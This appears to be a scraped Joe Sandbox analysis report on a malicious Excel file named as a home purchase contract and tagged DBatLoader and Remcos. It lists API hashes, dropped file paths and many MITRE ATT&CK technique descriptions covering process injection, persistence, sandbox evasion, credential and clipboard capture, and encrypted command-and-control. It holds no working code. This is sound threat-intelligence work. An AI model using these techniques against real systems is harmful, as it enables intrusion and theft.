Opcode ID: ee0ec0b738be6e2a11bb1b9866f988e8152407341bec28f9bdded66676659064
Instruction ID: e4e31fe806273662fb6603f4edf23d138324bd8f7eef65a328a2bc545960e23b
Opcode Fuzzy Hash: ee0ec0b738be6e2a11bb1b9866f988e8152407341bec28f9bdded66676659064
Instruction Fuzzy Hash: 0241ACB52443169FE7568F19DD84B36B3F9FF48714F00482DEA8AA7651EB31E904CB22

Function 02C8A2B8 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02C8A2EC
IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 02C8A31C
IsBadReadPtr.KERNEL32(?,00000008), ref: 02C8A33B
IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 02C8A347

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: 6749dca09a2808ede702bf45426d7d81c710bbadfd288e5e0b265e135c720541
Instruction ID: 5397204704ef7f1aab46e83f6446993daace211fdfa65c8aee27c9322e5ddbc3
Opcode Fuzzy Hash: 6749dca09a2808ede702bf45426d7d81c710bbadfd288e5e0b265e135c720541
Instruction Fuzzy Hash: 3A210671A407199BCB20EF69CC80BAEB3B9EF80765F508116EE5897340D734DD11DBA0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Home Purchase Contract and Property Details.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\notes\logs.dat

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

Windows Analysis Report
Home Purchase Contract and Property Details.xls

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre